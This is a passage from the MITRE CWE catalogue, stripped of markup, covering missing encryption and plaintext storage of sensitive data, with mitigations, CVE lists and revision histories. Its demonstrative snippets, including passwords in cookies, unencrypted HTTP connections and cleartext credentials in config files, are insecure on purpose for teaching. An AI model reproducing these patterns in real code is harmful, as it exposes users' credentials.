weakness is caused by missing a security tactic during the architecture and design phase. - - - Operation - - - High - - - Confidentiality - Read Application Data - If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhere near where the user is connected to the network (such as a colleague on the company network) but can be anywhere along the path from the user to the end server. - - - Confidentiality - Integrity - Modify Application Data - Omitting the use of encryption in any program which transfers data over a network of any kind should be considered on par with delivering the data sent to each user on the local networks of both the sender and receiver. Worse, this omission allows for the injection of data into a stream of communication between two parties -- with no means for the victims to separate valid data from invalid. In this day of widespread network attacks and password collection sniffers, it is an unnecessary risk to omit encryption from the design of any system which might benefit from it. - - - - - Manual Analysis - The characterizaton of sensitive data often requires domain-specific understanding, so manual methods are useful. However, manual efforts might not achieve desired code coverage within limited time constraints. Black box methods may produce artifacts (e.g. stored data or unencrypted network transfer) that require manual evaluation. - High - - - Automated Analysis - Automated measurement of the entropy of an input/output source may indicate the use or lack of encryption, but human analysis is still required to distinguish intentionally-unencrypted data (e.g. metadata) from sensitive data. - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Network Sniffer - - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Automated Monitored Execution - Man-in-the-middle attack tool - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Requirements - Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms. - - - Architecture and Design - - Ensure that encryption is properly integrated into the system design, including but not necessarily limited to: - - - Encryption that is needed to store or transmit private data of the users of the system - Encryption that is needed to protect the system itself from unauthorized disclosure or tampering - - - Identify the separate needs and contexts for encryption: - - - One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the software) does not need to have access to a private key. - Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others. - - - Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7] - - - - Architecture and Design - Libraries or Frameworks - - When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis. - For example, US government systems require FIPS 140-2 certification. - Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak. - Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267] - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - Architecture and Design - When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. - - - Implementation - Attack Surface Reduction - Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. - Defense in Depth - This makes it easier to spot places in the code where data is being used that is unencrypted. - - - - - This code writes a user's login information to a cookie so the user does not have to login again later. - - function persistLogin($username, $password){$data = array("username" => $username, "password"=> $password);setcookie ("userdata", $data);} - - The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. - Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). - - - The following code attempts to establish a connection, read in a password, then store it to a buffer. - - server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error("Unknown host");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { - - write(dfd,password_buffer,n);... - - - - - While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. - - - The following code attempts to establish a connection to a site to communicate sensitive information. - - try {URL u = new URL("http://www.secret.example.org/");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod("PUT");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();}catch (IOException e) { - - - //... - - - } - - Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. - - - - - CVE-2009-2272 - password and username stored in cleartext in a cookie - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272 - - - CVE-2009-1466 - password stored in cleartext in a file with insecure permissions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466 - - - CVE-2009-0152 - chat program disables SSL in some circumstances even when the user says to use SSL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152 - - - CVE-2009-1603 - Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603 - - - CVE-2009-0964 - storage of unencrypted passwords in a database - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964 - - - CVE-2008-6157 - storage of unencrypted passwords in a database - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157 - - - CVE-2008-6828 - product stores a password in cleartext in memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828 - - - CVE-2008-1567 - storage of a secret key in cleartext in a temporary file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567 - - - CVE-2008-0174 - SCADA product uses HTTP Basic Authentication, which is not encrypted - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174 - - - CVE-2007-5778 - login credentials stored unencrypted in a registry key - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778 - - - CVE-2002-1949 - Passwords transmitted in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949 - - - CVE-2008-4122 - Chain: Use of HTTPS cookie without "secure" flag causes it to be transmitted across unencrypted HTTP. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122 - - - CVE-2008-3289 - Product sends password hash in cleartext in violation of intended policy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289 - - - CVE-2008-4390 - Remote management feature sends sensitive information including passwords in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390 - - - CVE-2007-5626 - Backup routine sends password in cleartext in email. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626 - - - CVE-2004-1852 - Product transmits Blowfish encryption key in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852 - - - CVE-2008-0374 - Printer sends configuration information, including administrative password, in cleartext. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374 - - - CVE-2007-4961 - Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961 - - - CVE-2007-4786 - Product sends passwords in cleartext to a log server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786 - - - CVE-2005-3140 - Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140 - - - - - Failure to encrypt data - - - A8 - Insecure Cryptographic Storage - CWE More Specific - - - A9 - Insecure Communications - CWE More Specific - - - A8 - Insecure Storage - CWE More Specific - - - 4 - Insufficient Transport Layer Protection - - - MSC00-J - Use SSLSocket rather than Socket for secure data exchange - - - SFP23 - Exposed Data - - - - - - - - - - - - - - - - - - - - - - - - - - - - There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationship_Notes - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Relationships - - Failure to Encrypt Data - Failure to Encrypt Sensitive Data - - - - The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere. - Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - An attacker with access to the system could read sensitive information stored in cleartext. - - - - - The following code excerpt stores a plaintext user account ID in a browser cookie. - - response.addCookie( new Cookie("userAccountID", acctID); - - Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. - - - This code writes a user's login information to a cookie so the user does not have to login again later. - - function persistLogin($username, $password){$data = array("username" => $username, "password"=> $password);setcookie ("userdata", $data);} - - The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. - Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). - - - The following code attempts to establish a connection, read in a password, then store it to a buffer. - - server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error("Unknown host");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { - - write(dfd,password_buffer,n);... - - - - - While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - CVE-2009-2272 - password and username stored in cleartext in a cookie - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272 - - - CVE-2009-1466 - password stored in cleartext in a file with insecure permissions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466 - - - CVE-2009-0152 - chat program disables SSL in some circumstances even when the user says to use SSL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152 - - - CVE-2009-1603 - Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603 - - - CVE-2009-0964 - storage of unencrypted passwords in a database - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964 - - - CVE-2008-6157 - storage of unencrypted passwords in a database - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157 - - - CVE-2008-6828 - product stores a password in cleartext in memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828 - - - CVE-2008-1567 - storage of a secret key in cleartext in a temporary file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567 - - - CVE-2008-0174 - SCADA product uses HTTP Basic Authentication, which is not encrypted - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174 - - - CVE-2007-5778 - login credentials stored unencrypted in a registry key - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778 - - - CVE-2001-1481 - Plaintext credentials in world-readable file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481 - - - CVE-2005-1828 - Password in cleartext in config file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828 - - - CVE-2005-2209 - Password in cleartext in config file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209 - - - CVE-2002-1696 - Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696 - - - CVE-2004-2397 - Plaintext storage of private key and passphrase in log file when user imports the key. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397 - - - CVE-2002-1800 - Admin password in plaintext in a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800 - - - CVE-2001-1537 - Default configuration has cleartext usernames/passwords in cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537 - - - CVE-2001-1536 - Usernames/passwords in cleartext in cookies. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536 - - - CVE-2005-2160 - Authentication information stored in cleartext in a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160 - - - - - Plaintext Storage of Sensitive Information - - - SFP23 - Exposed Data - - - - - - - - - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-06-21 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2013-07-17 - updated Description, Relationships, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-01-23 - updated Abstraction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Plaintext Storage of Sensitive Information - - - - The application stores sensitive information in cleartext in a file, or on disk. - The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - - - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - CVE-2001-1481 - Cleartext credentials in world-readable file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481 - - - CVE-2005-1828 - Password in cleartext in config file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828 - - - CVE-2005-2209 - Password in cleartext in config file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209 - - - CVE-2002-1696 - Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696 - - - CVE-2004-2397 - Cleartext storage of private key and passphrase in log file when user imports the key. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397 - - - - - Plaintext Storage in File or on Disk - - - SFP23 - Exposed Data - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Plaintext Storage in File or on Disk - Plaintext Storage in a File or on Disk - - - - The application stores sensitive information in cleartext in the registry. - Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - - - - - CVE-2005-2227 - Cleartext passwords in registry key. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2227 - - - - - Plaintext Storage in Registry - - - SFP23 - Exposed Data - - - - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Plaintext Storage in Registry - Plaintext Storage in the Registry - - - - The application stores sensitive information in cleartext in a cookie. - Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - - - - - The following code excerpt stores a plaintext user account ID in a browser cookie. - - response.addCookie( new Cookie("userAccountID", acctID); - - Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. - - - - - CVE-2002-1800 - Admin password in cleartext in a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800 - - - CVE-2001-1537 - Default configuration has cleartext usernames/passwords in cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537 - - - CVE-2001-1536 - Usernames/passwords in cleartext in cookies. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536 - - - CVE-2005-2160 - Authentication information stored in cleartext in a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160 - - - - - Plaintext Storage in Cookie - - - SFP23 - Exposed Data - - - - - - - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Plaintext Storage in Cookie - Plaintext Storage in a Cookie - - - - The application stores sensitive information in cleartext in memory. - - The sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the application crashes, or if the programmer does not properly clear the memory before freeing it. - It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness. - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Memory - - - - - CVE-2001-1517 - Sensitive authentication information in cleartext in memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1517 - - - BID:10155 - Sensitive authentication information in cleartext in memory. - http://www.securityfocus.com/bid/10155 - - - CVE-2001-0984 - Password protector leaves passwords in memory when window is minimized, even when "clear password when minimized" is set. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0984 - - - CVE-2003-0291 - SSH client does not clear credentials from memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291 - - - - Memory - - - - Plaintext Storage in Memory - - - SFP23 - Exposed Data - - - - This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory. - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Plaintext Storage in Memory - - - - The application stores sensitive information in cleartext within the GUI. - An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Memory - Read Application Data - - - - - CVE-2002-1848 - Unencrypted passwords stored in GUI dialog may allow local users to access the passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1848 - - - - - Plaintext Storage in GUI - - - SFP23 - Exposed Data - - - - Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Plaintext 